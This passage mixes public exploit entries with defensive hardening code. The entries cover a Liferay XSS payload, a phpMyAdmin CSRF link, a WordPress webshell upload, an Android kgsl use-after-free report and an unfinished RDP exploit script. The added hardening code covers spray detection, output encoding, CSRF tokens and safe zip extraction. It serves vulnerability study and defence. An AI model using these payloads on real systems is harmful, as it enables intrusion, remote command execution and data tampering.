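Mar 13 14:40:02 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<mursten>, method=PLAIN, rip=192.168.1.21, lip=192.168.1.13, session=<a3>
Mar 13 14:40:03 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<tegel>, method=PLAIN, rip=192.168.1.21, lip=192.168.1.13, session=<a4>
Mar 13 14:40:03 fowsniff dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<parede>, method=PLAIN, rip=192.168.1.21, lip=192.168.1.13, session=<a5>
Mar 13 14:40:04 fowsniff dovecot: pop3-login: Login: user=<seina>, method=PLAIN, rip=192.168.1.21, lip=192.168.1.13, mpid=1234, session=<a6>
Mar 13 14:41:00 fowsniff dovecot: imap-login: Disconnected (auth failed, 1 attempts in 5 secs): user=<baksteen>, method=PLAIN, rip=192.168.1.50, lip=192.168.1.13, session=<b1>
Mar 13 14:41:30 fowsniff dovecot: imap-login: Login: user=<baksteen>, method=PLAIN, rip=192.168.1.50, lip=192.168.1.13, mpid=1240, session=<b2>
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: (?P<proto>pop3|imap)-login: "
    r"(?P<event>Disconnected \(auth failed|Login)[^:]*: user=<(?P<user>[^>]*)>.*?\brip=(?P<rip>[\d.]+)"
)


def parse_events(text: str) -> list:
    """Turn matching lines into dicts: timestamp, protocol, success flag, user, client IP."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # other Dovecot noise is ignored
        events.append({
            "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),  # year-less, fine for deltas
            "proto": m["proto"],
            "ok": m["event"] == "Login",
            "user": m["user"],
            "rip": m["rip"],
        })
    return events


def detect_spraying(text: str, min_failures: int = 5, min_users: int = 3, window_s: int = 60) -> list:
    """Flag client IPs that fail against several distinct mailboxes inside one window,
    and report which accounts that same IP then logged into (the ones to reset first)."""
    by_ip = defaultdict(list)
    for e in parse_events(text):
        by_ip[e["rip"]].append(e)
    alerts = []
    for rip, evs in sorted(by_ip.items()):
        fails = [e for e in evs if not e["ok"]]
        if len(fails) < min_failures:
            continue
        first, last = min(e["ts"] for e in fails), max(e["ts"] for e in fails)
        users = {e["user"] for e in fails}
        if (last - first).total_seconds() <= window_s and len(users) >= min_users:
            logins_after = [e["user"] for e in evs if e["ok"] and e["ts"] >= first]
            alerts.append({"rip": rip, "failures": len(fails), "distinct_users": len(users),
                           "span_seconds": (last - first).total_seconds(),
                           "logins_after": logins_after})
    return alerts


if __name__ == "__main__":
    for a in detect_spraying(SAMPLE_LOG):
        print("%(rip)s: %(failures)d failures over %(distinct_users)d users in %(span_seconds).0fs,"
              " then logged in as %(logins_after)s" % a)
```

The user count matters as much as the failure count: a forgotten password produces many failures against one mailbox, while a leaked list produces one or two failures against each of many. Dovecot's own `auth_failure_delay` and a fail2ban jail on the same lines slow the spray down; the detection above is what tells you which accounts were reached once it has happened.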
  8. # Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/

Introduction

In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input into the "url" parameter of the JSP taglib call <liferay-ui:captcha url="<%= url %>" /> or <liferay-captcha:captcha url="<%= url %>" />. A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.

PoC

In a sample scenario of custom code calling the <liferay-ui:captcha url="<%= url %>" /> JSP taglib, appending a payload like the following to the body parameters of a customized form:

&xxxx%22%3e%3cscript%3ealert(1)</script>

The script is reflected in the src attribute of the <img> tag, responsible for fetching the next available captcha:

<img alt="xxx" class="xxxx" src="xxxxxx"><script>alert(1)</script>=" />
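Both XSS entries on this page, the stored UliCMS one (item 2) and the reflected Liferay one above, end the same way: a value containing `"><script>` lands inside an HTML attribute and closes it. The following Python is an added example, not code from either project, showing the raw interpolation beside the attribute-context encoding that keeps the payload inert, plus the scheme allow-list that encoding alone does not give you for a src or href. The `render_img_*` helpers stand in for the taglib and are assumptions about how the markup is assembled.

```python
import html
from urllib.parse import urlsplit

# Decoded form of the Liferay PoC payload (&xxxx%22%3e%3cscript%3ealert(1)</script>).
PAYLOAD = 'xxxx"><script>alert(1)</script>'


def render_img_vulnerable(url: str) -> str:
    """What the vulnerable taglib usage amounts to: the value is dropped raw into src."""
    return '<img alt="captcha" src="%s" />' % url


def attr_escape(value: str) -> str:
    """HTML attribute-context encoding. quote=True turns both quote characters into
    entities, so a value can never terminate the attribute it is placed in."""
    return html.escape(value, quote=True)


def safe_url(url: str, allowed_schemes=("", "http", "https")) -> str:
    """Scheme allow-list: encoding does not neutralise javascript: in src/href,
    so validate the value as a URL before encoding it. Relative URLs have scheme ''."""
    return url if urlsplit(url).scheme.lower() in allowed_schemes else ""


def render_img_hardened(url: str) -> str:
    """Validate as a URL, then encode for the attribute context. Same fix applies to the
    stored UliCMS case: encode at render time, whatever was saved."""
    return '<img alt="captcha" src="%s" />' % attr_escape(safe_url(url))


def escapes_attribute(markup: str) -> bool:
    """Oracle for the check below: did anything other than the intended <img> tag appear?"""
    return markup.count("<") > 1


if __name__ == "__main__":
    print("vulnerable:", render_img_vulnerable(PAYLOAD))
    print("hardened:  ", render_img_hardened(PAYLOAD))
```

The hardened output is `src="xxxx&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;"`: the browser decodes the entities into the attribute value, so the captcha request simply 404s instead of a script running. Liferay's own fix is in the taglib; custom portlets that built the URL themselves needed the same two steps.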
  9. # Exploit Title: Cross Site Request Forgery (CSRF)
# Date: 11 June 2019
# Exploit Author: Riemann
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: 4.8
# Tested on: UBUNTU 16.04 LTS - Installed Docker image - docker pull phpmyadmin/phpmyadmin: 4.8
# CVE : 2019-12616

# Description
# An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.

#VULNERABILITY:
The following request, which is a form submission, is done using the "GET" method instead of "POST":

<form method="get" action="index.php" class="disableAjax">

GET http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Cookie: pmaCookieVer=5; pma_lang=en; pma_collation_connection=utf8mb4_unicode_ci; pmaUser-1=%7B%22iv%22%3A%22M16ZzlA0rqF9BZ1jFsssjQ%3D%3D%22%2C%22mac%22%3A%22804941d12fceca0997e181cbcb8427d68c668240%22%2C%22payload%22%3A%22mD9juTxAYhC7lA7XPWHWOw%3D%3D%22%7D; phpMyAdmin=9bdd66557e399fc1447bf253bc2dc133
Upgrade-Insecure-Requests: 1
Host: localhost:9000

The attacker can easily create a fake hyperlink containing the request they want to execute on behalf of the user, in this way making a CSRF attack possible due to the wrong use of the HTTP method.

#POC
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>POC CVE-2019-12616</title>
</head>
<body>
<a href="http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')&show_query=1&db=phpmyadmin&table=pma__bookmark">View my Pictures!</a>
</body>
</html>
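The weakness in the entry above is structural: a state-changing action reachable by GET can be carried by any <a> or <img> on any site, and the browser will attach the victim's cookies. The following Python is an added example, not phpMyAdmin code; it parses the PoC link from the entry the way a PHP `$_GET` array would see it, then contrasts a handler that runs the query regardless (the pre-4.9.0 behaviour) with one that requires POST plus a session-bound token. `SECRET_KEY`, the session ids and the handler names are constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# The link from the PoC above: the entire state-changing request fits in a GET URL.
POC_URL = ("http://localhost:9000/tbl_sql.php?sql_query=INSERT+INTO+`pma__bookmark`+(`id`%2C+`dbase`%2C"
           "+`user`%2C+`label`%2C+`query`)+VALUES+(DAYOFWEEK('')%2C+''%2C+''%2C+''%2C+'')"
           "&show_query=1&db=phpmyadmin&table=pma__bookmark")

# Constructed server-side key; a real deployment loads it from protected config.
SECRET_KEY = secrets.token_bytes(32)


def params_from_url(url: str) -> dict:
    """Flatten the query string the way a PHP $_GET array would present it."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC(secret, session id). A page rendered inside the
    victim's session can embed it in its forms; a cross-site page cannot read it."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_sql_request_vulnerable(method: str, params: dict, session_id: str) -> str:
    """Models the behaviour the entry describes: the query runs whatever the method,
    and nothing ties the request to a page the user actually submitted."""
    return "executed" if params.get("sql_query") else "rejected:missing"


def handle_sql_request(method: str, params: dict, session_id: str) -> str:
    """Hardened handler: state-changing requests must be POST and carry the session's token."""
    if method != "POST":
        return "rejected:method"      # <a>/<img> can only produce GET
    supplied = params.get("token", "")
    if not hmac.compare_digest(supplied, issue_csrf_token(session_id)):
        return "rejected:token"       # an auto-submitting cross-site form lacks the token
    return "executed"


if __name__ == "__main__":
    p = params_from_url(POC_URL)
    print("query carried by the link:", p["sql_query"])
    print("vulnerable:", handle_sql_request_vulnerable("GET", p, "victim-session"))
    print("hardened:  ", handle_sql_request("GET", p, "victim-session"))
```

Two details carry the weight. `hmac.compare_digest` keeps the token comparison constant-time, and binding the token to the session id (rather than issuing a random per-user value stored server-side) means a token captured from one session does nothing in another. Setting the session cookie with `SameSite=Lax` or `Strict` is a second, independent layer: it stops the browser attaching the cookie to the cross-site request in the first place.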
  10. # Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive
# Date: june 2019
# Exploit Author: xulchibalraa
# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
# Version: 4.2995 <= 4.2997
# Tested on: Wordpress 5.1.1, PHP 5.6
# CVE : -

## 1. Create a .zip archive with 2 files: index.html, index.php

echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)

## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)

## 4. Access the webshell from the URL displayed after upload similar to http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami
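The plugin entry above extracts whatever the archive contains into a directory the web server executes PHP from. The following Python is an added example, not the plugin's code, showing the extraction policy an e-learning uploader needs: an allow-list of content types it legitimately serves, a block-list matched against every suffix of a name (so `cover.php.png` is caught, and so is `.htaccess`), rejection of traversal and symlink members, and a final realpath check that the write lands under the destination. The sample archive is constructed in memory from the PoC's two file names plus two hostile members; the extension sets are assumptions a deployment would tune.

```python
import io
import os
import posixpath
import tempfile
import zipfile

# Content types an e-learning package legitimately needs to serve (assumed list).
ALLOWED_EXT = {".html", ".htm", ".css", ".js", ".json", ".xml", ".png", ".jpg",
               ".jpeg", ".gif", ".svg", ".mp3", ".mp4", ".woff", ".woff2"}
# Anything the web server would execute rather than serve. Matched against every
# suffix of the name, so "cover.php.png" is caught as well as "index.php".
BLOCKED_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar", ".phps",
               ".htaccess", ".cgi", ".pl", ".py", ".sh", ".asp", ".aspx", ".jsp"}


def classify_entry(name: str):
    """Return None when an archive member may be written below the upload directory,
    otherwise a short reason for rejecting it."""
    if "\\" in name or name.startswith("/"):
        return "absolute path or backslash"
    parts = posixpath.normpath(name).split("/")
    if ".." in parts:
        return "path traversal"
    if name.endswith("/"):
        return None                            # directory entry, carries no content
    base = parts[-1].lower()
    suffixes = {"." + s for s in base.split(".")[1:]}
    if suffixes & BLOCKED_EXT:
        return "server-side executable extension"
    last = "." + base.rsplit(".", 1)[1] if "." in base else ""
    if last not in ALLOWED_EXT:
        return "extension not on allow-list"
    return None


def safe_extract(zip_bytes: bytes, dest_dir: str):
    """Extract only acceptable members of an uploaded archive into dest_dir.
    Returns (extracted_names, [(name, reason), ...])."""
    extracted, rejected = [], []
    root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reason = classify_entry(info.filename)
            if reason is None and (info.external_attr >> 16) & 0o170000 == 0o120000:
                reason = "symlink"              # never materialise links inside a web root
            if reason is None and info.is_dir():
                continue
            if reason is None:
                target = os.path.realpath(os.path.join(root, *info.filename.split("/")))
                if not target.startswith(root + os.sep):
                    reason = "escapes destination"
            if reason is not None:
                rejected.append((info.filename, reason))
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            extracted.append(info.filename)
    return extracted, rejected


def build_sample_zip() -> bytes:
    """Constructed archive: the PoC's two file names plus two further hostile members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.html", "<html>hello</html>")
        zf.writestr("index.php", "<?php /* would be executed if served */ ?>")
        zf.writestr("cover.php.png", "not an image")
        zf.writestr("../escape.html", "<html></html>")
    return buf.getvalue()


def demo():
    """Run the extractor against the sample archive in a scratch directory."""
    with tempfile.TemporaryDirectory() as scratch:
        return safe_extract(build_sample_zip(), scratch)


if __name__ == "__main__":
    extracted, rejected = demo()
    print("extracted:", extracted)
    for name, reason in rejected:
        print("rejected %s: %s" % (name, reason))
```

The extension policy is the part that maps directly to this bug; the traversal and symlink checks close the neighbouring ones that zip extractors tend to have. A second, independent layer is to keep the upload directory from executing anything at all (a `php_admin_flag engine off` or an equivalent rule in the web server for that path), so a file the policy misses is still only served as text.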
  11. The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others): When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages as dirty using the function set_page_dirty(). This function first loads page->mapping using page_mapping(), then calls the function pointer mapping->a_ops->set_page_dirty. The bug is that, as explained in upstream commit e92bb4dd9673 ( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629), the mapping of a page can be freed concurrently unless it is protected somehow (e.g. by holding the page lock, or by holding a reference to the mapping). For callers who don't hold any such lock or reference, set_page_dirty_lock() is provided to safely mark a page as dirty: ================================== /* * set_page_dirty() is racy if the caller has no reference against * page->mapping->host, and if the page is unlocked. This is because another * CPU could truncate the page off the mapping and then free the mapping. * * Usually, the page _is_ locked, or the caller is a user-space process which * holds a reference on the inode by having an open file. * * In other cases, the page should be locked before running set_page_dirty(). */ int set_page_dirty_lock(struct page *page) { int ret; lock_page(page); ret = set_page_dirty(page); unlock_page(page); return ret; } ================================== To reproduce on a Pixel 2 (walleye): - Check out the tree specified above. - Enable KASAN in the kernel config. - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the race window much bigger. - Build and boot the kernel. - Build the attached poc.c with `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`. - Run the PoC on the device (adb push, then run from adb shell). 
You should see a kernel crash like this; note KASAN's report of a UAF in set_page_dirty():

==================================
<6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0
<3>[ 447.372706] c3 2621 ==================================================================
<3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0
<3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621
<3>[ 447.387059] c3 2621
<4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.418479] c3 2621 Call trace:
<4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4
<4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c
<4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc
<4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340
<4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340
<4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90
<4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0
<4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218
<4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c
<4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c
<4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718
<4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.497696] c3 2621
<3>[ 447.503818] c3 2621 Allocated by task 2684:
<4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124
<4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4
<4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c
<4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c
<4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234
<4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0
<4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8
<4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00
<4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230
<4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404
<4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188
<4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4
<4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18
<4>[ 447.589787] c3 2621 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28
<3>[ 447.594909] c3 2621
<3>[ 447.599065] c3 2621 Freed by task 36:
<4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8
<4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20
<4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0
<4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8
<4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20
<4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264
<4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130
<4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40
<3>[ 447.645765] c3 2621
<3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000
<3>[ 447.649913] c3 2621  which belongs to the cache ext4_inode_cache of size 1048
<3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of
<3>[ 447.652315] c3 2621  1048-byte region [0000000000000000, 0000000000000000)
<3>[ 447.667170] c3 2621
<3>[ 447.667170] c3 2621 The buggy address belongs to the page:
<1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000
<1>[ 447.686392] c3 2621 pgd = 0000000000000000
<1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000
<4>[ 447.706506] c3 2621 ------------[ cut here ]------------
<2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable]
<0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP
<4>[ 447.719517] c3 2621 Modules linked in:
<4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45
<4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
<4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put
<4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000
<4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0
<4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18
<4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5
==================================

The KASAN report points to instruction 267c in the following assembly:

==================================
0000000000002630 <set_page_dirty>:
{
    2630:	a9bd7bfd 	stp	x29, x30, [sp, #-48]!
    2634:	910003fd 	mov	x29, sp
    2638:	a90153f3 	stp	x19, x20, [sp, #16]
    263c:	f90013f5 	str	x21, [sp, #32]
    2640:	aa0003f3 	mov	x19, x0
	struct address_space *mapping = page_mapping(page);
    2644:	94000000 	bl	0 <page_mapping>
    2648:	aa0003f4 	mov	x20, x0
    264c:	d5384115 	mrs	x21, sp_el0
	if (current->jh_task_flags && mapping)
    2650:	9128a2a0 	add	x0, x21, #0xa28
    2654:	94000000 	bl	0 <__asan_load4>
    2658:	b94a2aa0 	ldr	w0, [x21, #2600]
    265c:	340000a0 	cbz	w0, 2670 <set_page_dirty+0x40>
    2660:	b40003b4 	cbz	x20, 26d4 <set_page_dirty+0xa4>
		msleep(500);
    2664:	52803e80 	mov	w0, #0x1f4                  	// #500
    2668:	94000000 	bl	0 <msleep>
    266c:	14000002 	b	2674 <set_page_dirty+0x44>
	if (likely(mapping)) {
    2670:	b4000334 	cbz	x20, 26d4 <set_page_dirty+0xa4>
		int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
    2674:	9101a280 	add	x0, x20, #0x68
    2678:	94000000 	bl	0 <__asan_load8>
    267c:	f9403694 	ldr	x20, [x20, #104]
    2680:	91006280 	add	x0, x20, #0x18
    2684:	94000000 	bl	0 <__asan_load8>
    2688:	f9400e94 	ldr	x20, [x20, #24]
    268c:	aa1303e0 	mov	x0, x19
    2690:	94000000 	bl	0 <__asan_load8>
    2694:	f9400260 	ldr	x0, [x19]
==================================

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46941.zip
12.

import socket, sys, struct
from OpenSSL import SSL
from impacket.structure import Structure

# I'm not responsible for what you use this to accomplish and should only be used for education purposes

# Could clean these up since I don't even use them
class TPKT(Structure):
    commonHdr = (
        ('Version','B=3'),
        ('Reserved','B=0'),
        ('Length','>H=len(TPDU)+4'),
        ('_TPDU','_-TPDU','self["Length"]-4'),
        ('TPDU',':=""'),
    )

class TPDU(Structure):
    commonHdr = (
        ('LengthIndicator','B=len(VariablePart)+1'),
        ('Code','B=0'),
        ('VariablePart',':=""'),
    )

    def __init__(self, data = None):
        Structure.__init__(self,data)
        self['VariablePart']=''

class CR_TPDU(Structure):
    commonHdr = (
        ('DST-REF','<H=0'),
        ('SRC-REF','<H=0'),
        ('CLASS-OPTION','B=0'),
        ('Type','B=0'),
        ('Flags','B=0'),
        ('Length','<H=8'),
    )

class DATA_TPDU(Structure):
    commonHdr = (
        ('EOT','B=0x80'),
        ('UserData',':=""'),
    )

    def __init__(self, data = None):
        Structure.__init__(self,data)
        self['UserData'] =''

class RDP_NEG_REQ(CR_TPDU):
    structure = (
        ('requestedProtocols','<L'),
    )
    def __init__(self,data=None):
        CR_TPDU.__init__(self,data)
        if data is None:
            self['Type'] = 1

# X.224 Connection Request carrying an RDP negotiation request, then a TLS handshake
# over the same socket.
def send_init_packets(host):
    tpkt = TPKT()
    tpdu = TPDU()
    rdp_neg = RDP_NEG_REQ()
    rdp_neg['Type'] = 1
    rdp_neg['requestedProtocols'] = 1
    tpdu['VariablePart'] = rdp_neg.getData()
    tpdu['Code'] = 0xe0
    tpkt['TPDU'] = tpdu.getData()
    s = socket.socket()
    s.connect((host, 3389))
    s.sendall(tpkt.getData())
    s.recv(8192)
    ctx = SSL.Context(SSL.TLSv1_METHOD)
    tls = SSL.Connection(ctx,s)
    tls.set_connect_state()
    tls.do_handshake()
    return tls

# This can be fixed length now buttfuckit
# MCS Connect Initial with the client data blocks; the length fields are patched into
# the byte array after the fact.
def send_client_data(tls):
    p = "\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x07\xc2\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x01\x22\x02\x01\x02\x02\x01\x00\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x30\x19\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\x04\x20\x02\x01\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x01\x01\x02\x01\x00\x02\x01\x01\x02\x02\xff\xff\x02\x01\x02\x04\x82\x01\x61\x00\x05\x00\x14\x7c\x00\x01\x81\x48\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x34\x01\xc0\xea\x00\x0a\x00\x08\x00\x80\x07\x38\x04\x01\xca\x03\xaa\x09\x04\x00\x00\xee\x42\x00\x00\x44\x00\x45\x00\x53\x00\x4b\x00\x54\x00\x4f\x00\x50\x00\x2d\x00\x46\x00\x38\x00\x34\x00\x30\x00\x47\x00\x49\x00\x4b\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x18\x00\x0f\x00\xaf\x07\x62\x00\x63\x00\x37\x00\x38\x00\x65\x00\x66\x00\x36\x00\x33\x00\x2d\x00\x39\x00\x64\x00\x33\x00\x33\x00\x2d\x00\x34\x00\x31\x00\x39\x38\x00\x38\x00\x2d\x00\x39\x00\x32\x00\x63\x00\x66\x00\x2d\x00\x00\x31\x00\x62\x00\x32\x00\x64\x00\x61\x00\x42\x42\x42\x42\x07\x00\x01\x00\x00\x00\x56\x02\x00\x00\x50\x01\x00\x00\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x04\xc0\x0c\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x38\x00\x04\x00\x00\x00\x72\x64\x70\x73\x6e\x64\x00\x00\x0f\x00\x00\xc0\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x64\x72\x64\x79\x6e\x76\x63\x00\x00\x00\x80\xc0\x4d\x53\x5f\x54\x31\x32\x30\x00\x00\x00\x00\x00"
    size0 = struct.pack(">h", len(p))
    size1 = struct.pack(">h", len(p)-12)
    size2 = struct.pack(">h", len(p)-109)
